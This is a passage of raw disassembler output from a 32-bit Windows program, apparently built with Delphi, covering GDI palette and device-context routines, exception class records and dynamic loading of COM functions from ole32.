call sub_400066E0 ; SetBkColor
push 1
mov eax, [ebx+4]
push eax
call sub_400066E8 ; SetBkMode
pop ebx
retn
sub_40015600 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4001567C proc near
var_424 = byte ptr -424h
var_420 = byte ptr -420h
var_408 = word ptr -408h
var_406 = word ptr -406h
var_404 = byte ptr -404h
var_3E8 = dword ptr -3E8h
var_3E4 = byte ptr -3E4h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFBF8h
push ebx
mov [ebp+var_408], 300h
mov [ebp+var_406], 10h
lea edx, [ebp+var_404]
mov ecx, 40h
call sub_40002DFC
push 0
call sub_40006718 ; GetDC
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_40015779
push dword ptr fs:[eax]
mov fs:[eax], esp
push 68h
mov eax, [ebp+var_4]
push eax
call sub_400066A8 ; GetDeviceCaps
mov ebx, eax
cmp ebx, 10h
jl loc_40015760
lea eax, [ebp+var_404]
push eax
push 8
push 0
mov eax, [ebp+var_4]
push eax
call sub_400066B8 ; GetSystemPaletteEntries
cmp [ebp+var_3E8], 0C0C0C0h
jnz short loc_40015742
lea eax, [ebp+var_3E8]
push eax
push 1
mov eax, ebx
sub eax, 8
push eax
mov eax, [ebp+var_4]
push eax
call sub_400066B8 ; GetSystemPaletteEntries
movzx eax, [ebp+var_406]
lea eax, [ebp+eax*4+var_420]
push eax
push 7
sub ebx, 7
push ebx
mov eax, [ebp+var_4]
push eax
call sub_400066B8 ; GetSystemPaletteEntries
lea eax, [ebp+var_3E4]
push eax
push 1
push 7
mov eax, [ebp+var_4]
push eax
call sub_400066B8 ; GetSystemPaletteEntries
jmp short loc_40015760
; ---------------------------------------------------------------------------
loc_40015742: ; CODE XREF: sub_4001567C+78�j
movzx eax, [ebp+var_406]
lea eax, [ebp+eax*4+var_424]
push eax
push 8
sub ebx, 8
push ebx
mov eax, [ebp+var_4]
push eax
call sub_400066B8 ; GetSystemPaletteEntries
loc_40015760: ; CODE XREF: sub_4001567C+54�j
; sub_4001567C+C4�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015780
loc_4001576D: ; CODE XREF: sub_4001567C+102�j
mov eax, [ebp+var_4]
push eax
push 0
call sub_40006748 ; ReleaseDC
retn
; ---------------------------------------------------------------------------
loc_40015779: ; DATA XREF: sub_4001567C+39�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001576D
; ---------------------------------------------------------------------------
loc_40015780: ; DATA XREF: sub_4001567C+EC�o
lea eax, [ebp+var_408]
push eax
call sub_40006680 ; CreatePalette
pop ebx
mov esp, ebp
pop ebp
retn
sub_4001567C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40015794 proc near ; CODE XREF: sub_40015C34+3B�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
mov eax, dword_4001AD44
call sub_40013AA4
mov [ebp+var_8], eax
xor eax, eax
push ebp
push offset loc_40015832
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_8]
mov eax, [eax+8]
dec eax
cmp eax, 0
jl short loc_4001581A
mov [ebp+var_4], eax
loc_400157C4: ; CODE XREF: sub_40015794+84�j
mov edx, [ebp+var_4]
mov eax, [ebp+var_8]
call sub_400137FC
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
call sub_400153AC
test al, al
jz short loc_40015811
xor eax, eax
push ebp
push offset loc_4001580A
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_C]
call sub_40015840
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015811
loc_40015801: ; CODE XREF: sub_40015794+7B�j
mov eax, [ebp+var_C]
call sub_40015408
retn
; ---------------------------------------------------------------------------
loc_4001580A: ; DATA XREF: sub_40015794+4D�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015801
; ---------------------------------------------------------------------------
loc_40015811: ; CODE XREF: sub_40015794+48�j
; sub_40015794+75�j
; DATA XREF: ...
dec [ebp+var_4]
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_400157C4
loc_4001581A: ; CODE XREF: sub_40015794+2B�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015839
loc_40015827: ; CODE XREF: sub_40015794+A3�j
mov eax, dword_4001AD44
call sub_40013B08
retn
; ---------------------------------------------------------------------------
loc_40015832: ; DATA XREF: sub_40015794+16�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015827
; ---------------------------------------------------------------------------
loc_40015839: ; CODE XREF: sub_40015794+9D�j
; DATA XREF: sub_40015794+8E�o
mov esp, ebp
pop ebp
retn
sub_40015794 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40015840 proc near ; CODE XREF: sub_40015794+5B�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
cmp dword ptr [eax+4], 0
jz loc_400158DB
mov eax, [ebp+var_4]
call sub_40015358
xor edx, edx
push ebp
push offset loc_400158D4
push dword ptr fs:[edx]
mov fs:[edx], esp
mov eax, [ebp+var_4]
mov eax, [eax+5Ch]
test eax, eax
jz short loc_40015882
push eax
mov eax, [ebp+var_4]
mov eax, [eax+4]
push eax
call sub_400066D0 ; SelectObject
loc_40015882: ; CODE XREF: sub_40015840+33�j
mov eax, [ebp+var_4]
mov eax, [eax+60h]
test eax, eax
jz short loc_4001589B
push 0FFFFFFFFh
push eax
mov eax, [ebp+var_4]
mov eax, [eax+4]
push eax
call sub_400066D8 ; SelectPalette
loc_4001589B: ; CODE XREF: sub_40015840+4A�j
mov eax, [ebp+var_4]
mov ebx, [eax+4]
xor edx, edx
mov eax, [ebp+var_4]
call sub_400154D8
push ebx
call sub_40006690 ; DeleteDC
mov edx, [ebp+var_4]
mov eax, dword_4001AD44
call sub_40013AB8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_400158DB
loc_400158CB: ; CODE XREF: sub_40015840+99�j
mov eax, [ebp+var_4]
call sub_40015408
retn
; ---------------------------------------------------------------------------
loc_400158D4: ; DATA XREF: sub_40015840+20�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_400158CB
; ---------------------------------------------------------------------------
loc_400158DB: ; CODE XREF: sub_40015840+F�j
; sub_40015840+93�j
; DATA XREF: ...
pop ebx
pop ecx
pop ebp
retn
sub_40015840 endp
; ---------------------------------------------------------------------------
align 10h
db 53h ; S
db 6Ah ; j
db 0
db 0E8h ; è
db 30h ; 0
db 0Eh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0D8h ; Ø
db 6Ah ; j
db 5Ah ; Z
db 53h ; S
db 0E8h ; è
db 0B6h ; ¶
db 0Dh
db 0FFh
db 0FFh
db 0A3h ; £
db 0Ch ; OFF32 SEGDEF [_bss,4001F30C]
db 0F3h ; ó
db 1
db 40h ; @
db 53h ; S
db 6Ah ; j
db 0
db 0E8h ; è
db 49h ; I
db 0Eh
db 0FFh
db 0FFh
db 0B8h ; ¸
db 48h ; H OFF32 SEGDEF [_data,4001AD48]
db 0ADh ;
db 1
db 40h ; @
db 0BAh ; º
db 0Fh
db 0
db 0
db 0
db 0E8h ; è
db 6Eh ; n
db 0FDh ; ý
db 0FFh
db 0FFh
db 0A3h ; £
db 4 ; OFF32 SEGDEF [_bss,4001F304]
db 0F3h ; ó
db 1
db 40h ; @
db 5Bh ; [
db 0C3h ; Ã
align 4
; =============== S U B R O U T I N E =======================================
sub_40015918 proc near ; CODE XREF: sub_40014F8C+178�p
var_C = byte ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFC8h
mov bl, 1
push 0
call sub_40006718 ; GetDC
mov esi, eax
test esi, esi
jz short loc_40015954
mov eax, ds:dword_4001F318
push eax
push esi
call sub_400066D0 ; SelectObject
test eax, eax
jz short loc_4001594C
push esp
push esi
call sub_400066C0 ; GetTextMetricsA
test eax, eax
jz short loc_4001594C
movzx ebx, [esp+40h+var_C]
loc_4001594C: ; CODE XREF: sub_40015918+22�j
; sub_40015918+2D�j
push esi
push 0
call sub_40006748 ; ReleaseDC
loc_40015954: ; CODE XREF: sub_40015918+12�j
mov eax, ebx
add esp, 38h
pop esi
pop ebx
retn
sub_40015918 endp
; ---------------------------------------------------------------------------
db 55h ; U
db 8Bh ; ‹
db 0ECh ; ì
db 81h ;
db 0C4h ; Ä
db 0F8h ; ø
db 0FEh ; þ
db 0FFh
db 0FFh
db 33h ; 3
db 0C0h ; À
db 89h ; ‰
db 45h ; E
db 0FCh ; ü
db 33h ; 3
db 0C0h ; À
db 55h ; U
db 68h ; h
db 5Fh ; _ OFF32 SEGDEF [_text,40015A5F]
db 5Ah ; Z
db 1
db 40h ; @
db 64h ; d
db 0FFh
db 30h ; 0
db 64h ; d
db 89h ; ‰
db 20h
db 6Ah ; j
db 48h ; H
db 0A1h ; ¡
db 0Ch ; OFF32 SEGDEF [_bss,4001F30C]
db 0F3h ; ó
db 1
db 40h ; @
db 50h ; P
db 6Ah ; j
db 8
db 0E8h ; è
db 81h ;
db 0Ch
db 0FFh
db 0FFh
db 0F7h ; ÷
db 0D8h ; Ø
db 0A3h ; £
db 0ACh ; ¬ OFF32 SEGDEF [_data,4001AAAC]
db 0AAh ; ª
db 1
db 40h ; @
db 0A1h ; ¡
db 0C8h ; È OFF32 SEGDEF [_data,4001B0C8]
db 0B0h ; °
db 1
db 40h ; @
db 83h ; ƒ
db 38h ; 8
db 1
db 75h ; u
db 16h
db 0E8h ; è
db 7Bh ; {
db 0FFh
db 0FFh
db 0FFh
db 3Ch ; <
db 80h ; €
db 75h ; u
db 0Dh
db 8Dh ;
db 45h ; E
db 0FCh ; ü
db 0BAh ; º
db 74h ; t OFF32 SEGDEF [_text,40015A74]
db 5Ah ; Z
db 1
db 40h ; @
db 0E8h ; è
db 6Eh ; n
db 0EFh ; ï
db 0FEh ; þ
db 0FFh
db 0B2h ; ²
db 1
db 0A1h ; ¡
db 4Ch ; L OFF32 SEGDEF [_text,4001404C]
db 40h ; @
db 1
db 40h ; @
db 0E8h ; è
db 92h ; ’
db 0E7h ; ç
db 0FFh
db 0FFh
db 89h ; ‰
db 45h ; E
db 0F8h ; ø
db 33h ; 3
db 0C0h ; À
db 55h ; U
db 68h ; h
db 17h ; OFF32 SEGDEF [_text,40015A17]
db 5Ah ; Z
db 1
db 40h ; @
db 64h ; d
db 0FFh
db 30h ; 0
db 64h ; d
db 89h ; ‰
db 20h
db 0BAh ; º
db 2
db 0
db 0
db 80h ; €
db 8Bh ; ‹
db 45h ; E
db 0F8h ; ø
db 0E8h ; è
db 14h
db 0E8h ; è
db 0FFh
db 0FFh
db 0BAh ; º
db 84h ; „ OFF32 SEGDEF [_text,40015A84]
db 5Ah ; Z
db 1
db 40h ; @
db 8Bh ; ‹
db 45h ; E
db 0F8h ; ø
db 0E8h ; è
db 8Fh ;
db 0E9h ; é
db 0FFh
db 0FFh
db 84h ; „
db 0C0h ; À
db 74h ; t
db 18h
db 8Dh ;
db 4Dh ; M
db 0FCh ; ü
db 0BAh ; º
db 0CCh ; Ì OFF32 SEGDEF [_text,40015ACC]
db 5Ah ; Z
db 1
db 40h ; @
db 8Bh ; ‹
db 45h ; E
db 0F8h ; ø
db 0E8h ; è
db 0DBh ; Û
db 0EBh ; ë
db 0FFh
db 0FFh
db 8Bh ; ‹
db 45h ; E
db 0F8h ; ø
db 0E8h ; è
db 0BBh ; »
db 0E7h ; ç
db 0FFh
db 0FFh
db 33h ; 3
db 0C0h ; À
db 5Ah ; Z
db 59h ; Y
db 59h ; Y
db 64h ; d
db 89h ; ‰
db 10h
db 68h ; h
db 1Eh ; OFF32 SEGDEF [_text,40015A1E]
db 5Ah ; Z
db 1
db 40h ; @
; ---------------------------------------------------------------------------
loc_40015A0E: ; CODE XREF: .text:40015A1C�j
mov eax, [ebp-8]
call sub_40003CE8
retn
; ---------------------------------------------------------------------------
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015A0E
; ---------------------------------------------------------------------------
loc_40015A1E: ; CODE XREF: .text:40015A16�j
cmp dword ptr [ebp-4], 0
jz short loc_40015A49
lea eax, [ebp-108h]
mov edx, [ebp-4]
mov ecx, 0FFh
call sub_40004B20
lea edx, [ebp-108h]
mov eax, offset byte_4001AAB7
mov cl, 1Fh
call sub_400034F4
loc_40015A49: ; CODE XREF: .text:40015A22�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015A66
loc_40015A56: ; CODE XREF: .text:40015A64�j
lea eax, [ebp-4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015A56
; ---------------------------------------------------------------------------
loc_40015A66: ; CODE XREF: .text:40015A5E�j
; DATA XREF: .text:40015A51�o
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 6
aTahoma db 'Tahoma',0
align 4
dd 0FFFFFFFFh, 3Ch
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes',0
align 4
dd 0FFFFFFFFh, 0Eh
dd 5320534Dh, 6C6C6568h, 676C4420h, 3220h
off_40015ADC dd offset dword_40015B28 ; DATA XREF: .itext:4001933E�o
dd 7 dup(0)
dd offset dword_40015B28
dd 20h
dd offset off_4000101C
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40015B70
dword_40015B28 dd 6150540Fh, 72657474h, 6E614D6Eh, 72656761h, 0D2845653h
; DATA XREF: .text:off_40015ADC�o
; .text:40015AFC�o
dd 0C4830874h, 0E3EAE8F0h, 0DA8BFFFEh, 468DF08Bh, 8DE85008h
dd 8BFFFF0Ah, 74DB84C6h, 0E42AE80Fh, 8F64FFFEh, 5, 0CC48300h
dd 5B5EC68Bh, 408DC3h
; =============== S U B R O U T I N E =======================================
sub_40015B70 proc near ; DATA XREF: .text:40015B24�o
push ebx
push esi
call sub_40003FD8
mov ebx, edx
mov esi, eax
mov eax, esi
call sub_40015BB4
lea eax, [esi+8]
push eax
call sub_40006518 ; RtlDeleteCriticalSection
test bl, bl
jle short loc_40015B96
mov eax, esi
call sub_40003F80
loc_40015B96: ; CODE XREF: sub_40015B70+1D�j
pop esi
pop ebx
retn
sub_40015B70 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40015B9C proc near ; CODE XREF: sub_40015BB4+19�p
add eax, 8
push eax
call sub_40006520 ; RtlEnterCriticalSection
retn
sub_40015B9C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40015BA8 proc near ; CODE XREF: sub_40015BB4+47�p
add eax, 8
push eax
call sub_400065E8 ; RtlLeaveCriticalSection
retn
sub_40015BA8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40015BB4 proc near ; CODE XREF: sub_40015B70+D�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
mov [ebp+var_4], eax
jmp short loc_40015C21
; ---------------------------------------------------------------------------
loc_40015BC1: ; CODE XREF: sub_40015BB4+75�j
mov [ebp+var_8], ebx
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
call sub_40015B9C
xor eax, eax
push ebp
push offset loc_40015C01
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_C]
mov eax, [eax]
mov edx, [ebp+var_4]
mov [edx+4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015C08
loc_40015BF8: ; CODE XREF: sub_40015BB4+52�j
mov eax, [ebp+var_4]
call sub_40015BA8
retn
; ---------------------------------------------------------------------------
loc_40015C01: ; DATA XREF: sub_40015BB4+21�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015BF8
; ---------------------------------------------------------------------------
loc_40015C08: ; CODE XREF: sub_40015BB4+4C�j
; DATA XREF: sub_40015BB4+3F�o
mov eax, [ebp+var_C]
mov esi, [eax+4]
test esi, esi
jz short loc_40015C19
mov eax, esi
call sub_40003CE8
loc_40015C19: ; CODE XREF: sub_40015BB4+5C�j
mov eax, [ebp+var_8]
call sub_40002C3C
loc_40015C21: ; CODE XREF: sub_40015BB4+B�j
mov eax, [ebp+var_4]
mov ebx, [eax+4]
test ebx, ebx
jnz short loc_40015BC1
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_40015BB4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40015C34 proc near ; DATA XREF: .text:400183B8�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40015CFD
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4001F308
jnz loc_40015CEF
mov eax, ds:dword_4001F360
call sub_40003CE8
mov eax, dword_4001AD40
call sub_40003CE8
mov eax, dword_4001AD3C
call sub_40003CE8
call sub_40015794
mov eax, dword_4001AD44
call sub_40003CE8
mov eax, ds:dword_4001F35C
call sub_40003CE8
mov eax, ds:dword_4001F350
call sub_40003CE8
mov eax, ds:dword_4001F354
call sub_40003CE8
mov eax, ds:dword_4001F358
call sub_40003CE8
mov eax, ds:dword_4001F304
push eax
call sub_40006698 ; DeleteObject
push offset dword_4001F320
call sub_40006518 ; RtlDeleteCriticalSection
push offset dword_4001F338
call sub_40006518 ; RtlDeleteCriticalSection
mov eax, offset dword_4001AAD8
mov ecx, 34h
mov edx, ds:off_40013198
call sub_40005314
mov eax, offset dword_4001AC78
mov ecx, 12h
mov edx, ds:off_40013198
call sub_40005314
loc_40015CEF: ; CODE XREF: sub_40015C34+17�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015D04
loc_40015CFC: ; CODE XREF: sub_40015C34+CE�j
retn
; ---------------------------------------------------------------------------
loc_40015CFD: ; DATA XREF: sub_40015C34+6�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015CFC
; ---------------------------------------------------------------------------
loc_40015D04: ; CODE XREF: sub_40015C34:loc_40015CFC�j
; DATA XREF: sub_40015C34+C3�o
pop ebp
retn
sub_40015C34 endp
; ---------------------------------------------------------------------------
align 4
off_40015D08 dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF08�o
dd 0FF93h
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B044�o
dd 0FF94h
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001B07C�o
dd 0FF95h
dd offset dword_4001E7F8 ; DATA XREF: .data:off_4001AF64�o
dd 0FF96h
off_40015D28 dd offset dword_40015D74 ; DATA XREF: .text:40015DA8�o
; sub_400165BC+21�r ...
dd 7 dup(0)
dd offset dword_40015D74
dd 0Ch
dd offset off_40006DE0
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40015D74 dd 6C4F4509h, 72724565h, 0C08B726Fh ; .text:40015D48�o
off_40015D80 dd offset dword_40015DCC ; DATA XREF: .text:40015E04�o
; sub_40016050+A�r ...
dd 7 dup(0)
dd offset dword_40015DCC
dd 10h
dd offset off_40015D28
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40015DCC dd 6C4F450Ch, 73795365h, 6F727245h, 408D72h ; .text:40015DA0�o
off_40015DDC dd offset dword_40015E28 ; DATA XREF: sub_40016180+B1�r
; sub_40016280+54�r ...
dd 2 dup(0)
dd offset dword_40015E28
dd 4 dup(0)
dd offset word_40015E42
dd 18h
dd offset off_40015D80
dd offset sub_40003EF4
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_40003F08
dd offset nullsub_4
dd offset sub_40003C80
dd offset sub_40003C9C
dd offset sub_40003CD8
dword_40015E28 dd 0Eh, 20000h ; .text:40015DE8�o
db 2 dup(0)
dd offset off_40001000
dw 10h
db 2 dup(0)
dd offset off_40001000
dw 14h
db 2 dup(0)
word_40015E42 dw 450Dh ; DATA XREF: .text:40015DFC�o
dword_40015E44 dd 45656C4Fh, 70656378h, 6E6F6974h, 0FFFFFFFFh, 9, 72617041h
dd 6E656D74h, 74h, 0FFFFFFFFh, 4, 65657246h, 0
dword_40015E74 dd 0FFFFFFFFh, 4, 68746F42h, 0dword_40015E84 dd 0FFFFFFFFh, 7, 7475654Eh, 6C6172h
; =============== S U B R O U T I N E =======================================
sub_40015E94 proc near ; CODE XREF: sub_40015FB8+35�p
push ebx
push esi
mov ebx, edx
mov esi, eax
mov eax, ebx
mov edx, esi
call sub_400048D8
mov eax, [ebx]
call sub_40008028
mov esi, eax
jmp short loc_40015EC9
; ---------------------------------------------------------------------------
loc_40015EAE: ; CODE XREF: sub_40015E94+45�j
; sub_40015E94+49�j
mov eax, [ebx]
call sub_40004D48
mov edx, esi
sub edx, eax
mov eax, ebx
call sub_40004F74
mov eax, [ebx]
call sub_40008028
mov esi, eax
loc_40015EC9: ; CODE XREF: sub_40015E94+18�j
mov eax, [ebx]
call sub_40004B44
test eax, eax
jle short loc_40015EDF
movzx eax, byte ptr [esi]
sub al, 21h
jb short loc_40015EAE
sub al, 0Dh
jz short loc_40015EAE
loc_40015EDF: ; CODE XREF: sub_40015E94+3E�j
pop esi
pop ebx
retn
sub_40015E94 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40015EE4 proc near ; CODE XREF: sub_40015FB8+41�p
; sub_40016050+F�p ...
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
push esi
push edi
xor ebx, ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
test dl, dl
jz short loc_40015F01
add esp, 0FFFFFFF0h
call sub_40003F30
loc_40015F01: ; CODE XREF: sub_40015EE4+13�j
mov edi, ecx
mov [ebp+var_5], dl
mov ebx, eax
mov esi, [ebp+arg_4]
xor eax, eax
push ebp
push offset loc_40015F8E
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_4]
mov edx, edi
call sub_4000491C
cmp [ebp+var_4], 0
jnz short loc_40015F5D
lea edx, [ebp+var_4]
mov eax, esi
call sub_4000A81C
cmp [ebp+var_4], 0
jnz short loc_40015F5D
push 0
lea edx, [ebp+var_C]
mov eax, off_4001AF08
call sub_400062F0
mov edx, [ebp+var_C]
mov [ebp+var_14], esi
mov [ebp+var_10], 0
lea ecx, [ebp+var_14]
lea eax, [ebp+var_4]
call sub_400086E0
loc_40015F5D: ; CODE XREF: sub_40015EE4+43�j
; sub_40015EE4+53�j
mov eax, [ebp+arg_0]
push eax
mov ecx, [ebp+var_4]
xor edx, edx
mov eax, ebx
call sub_4000B1BC
mov [ebx+0Ch], esi
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40015F95
loc_40015F7D: ; CODE XREF: sub_40015EE4+AF�j
lea eax, [ebp+var_C]
call sub_40004884
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_40015F8E: ; DATA XREF: sub_40015EE4+2A�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40015F7D
; ---------------------------------------------------------------------------
loc_40015F95: ; CODE XREF: sub_40015EE4+A9�j
; DATA XREF: sub_40015EE4+94�o
mov eax, ebx
cmp [ebp+var_5], 0
jz short loc_40015FAC
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_40015FAC: ; CODE XREF: sub_40015EE4+B7�j
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40015EE4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40015FB8 proc near ; CODE XREF: sub_40016180+B6�p
; sub_40016784+62�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0
push ebx
push esi
push edi
test dl, dl
jz short loc_40015FCC
add esp, 0FFFFFFF0h
call sub_40003F30
loc_40015FCC: ; CODE XREF: sub_40015FB8+A�j
mov esi, ecx
mov ebx, edx
mov edi, eax
xor eax, eax
push ebp
push offset loc_4001602A
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_0]
push eax
lea edx, [ebp+var_4]
mov eax, esi
call sub_40015E94
mov ecx, [ebp+var_4]
xor edx, edx
mov eax, edi
call sub_40015EE4
lea eax, [edi+10h]
mov edx, [ebp+arg_8]
call sub_400048D8
lea eax, [edi+14h]
mov edx, [ebp+arg_4]
call sub_400048D8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40016031
loc_40016021: ; CODE XREF: sub_40015FB8+77�j
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4001602A: ; DATA XREF: sub_40015FB8+1D�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40016021
; ---------------------------------------------------------------------------
loc_40016031: ; CODE XREF: sub_40015FB8+71�j
; DATA XREF: sub_40015FB8+64�o
mov eax, edi
test bl, bl
jz short loc_40016046
call sub_40003F88
pop large dword ptr fs:0
add esp, 0Ch
loc_40016046: ; CODE XREF: sub_40015FB8+7D�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ecx
pop ebp
retn 10h
sub_40015FB8 endp
; =============== S U B R O U T I N E =======================================
sub_40016050 proc near ; CODE XREF: sub_4001606C+7�p
push ebx
mov ebx, eax
push ebx
push 0
xor ecx, ecx
mov dl, 1
mov eax, ds:off_40015D80
call sub_40015EE4
call sub_400042E4
pop ebx
retn
sub_40016050 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4001606C proc near ; CODE XREF: sub_400165F0:loc_400166BC�p
test eax, 80000000h
jz short locret_40016078
call sub_40016050
locret_40016078: ; CODE XREF: sub_4001606C+5�j
retn
sub_4001606C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4001607C proc near ; CODE XREF: .itext:400193A1�p
push ebx
push offset dword_400160F0
call sub_400065A0 ; GetModuleHandleA
mov ebx, eax
test ebx, ebx
jz short loc_400160ED
push offset aCocreateinstan ; "CoCreateInstanceEx"
push ebx
call sub_400065A8 ; GetProcAddress
mov dword_4001AD88, eax
push offset aCoinitializeex ; "CoInitializeEx"
push ebx
call sub_400065A8 ; GetProcAddress
mov dword_4001AD8C, eax
push offset aCoaddrefserver ; "CoAddRefServerProcess"
push ebx
call sub_400065A8 ; GetProcAddress
mov dword_4001AD90, eax
push offset aCoreleaseserve ; "CoReleaseServerProcess"
push ebx
call sub_400065A8 ; GetProcAddress
mov dword_4001AD94, eax
push offset aCoresumeclasso ; "CoResumeClassObjects"
push ebx
call sub_400065A8 ; GetProcAddress
mov dword_4001AD98, eax
push offset aCosuspendclass ; "CoSuspendClassObjects"
push ebx
call sub_400065A8 ; GetProcAddress
mov dword_4001AD9C, eax
loc_400160ED: ; CODE XREF: sub_4001607C+F�j
pop ebx
retn
sub_4001607C endp
; ---------------------------------------------------------------------------
align 10h
dword_400160F0 dd 33656C6Fh, 6C642E32h, 6ChaCocreateinstan db 'CoCreateInstanceEx',0 ; DATA XREF: sub_4001607C+11�o
align 10h
aCoinitializeex db 'CoInitializeEx',0 ; DATA XREF: sub_4001607C+21�o
align 10h
aCoaddrefserver db 'CoAddRefServerProcess',0 ; DATA XREF: sub_4001607C+31�o
align 4
aCoreleaseserve db 'CoReleaseServerProcess',0 ; DATA XREF: sub_4001607C+41�o
align 10h
aCoresumeclasso db 'CoResumeClassObjects',0 ; DATA XREF: sub_4001607C+51�o
align 4
aCosuspendclass db 'CoSuspendClassObjects',0 ; DATA XREF: sub_4001607C+61�o
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40016180 proc near ; DATA XREF: .itext:400193BE�o
; .bss:off_4001C020�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 40016277 SIZE 00000006 BYTES
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
mov esi, edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40016270
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
mov [ebp+var_14], eax
lea eax, [ebp+var_4]
call sub_40006204
push eax
push 0
call sub_40006B08
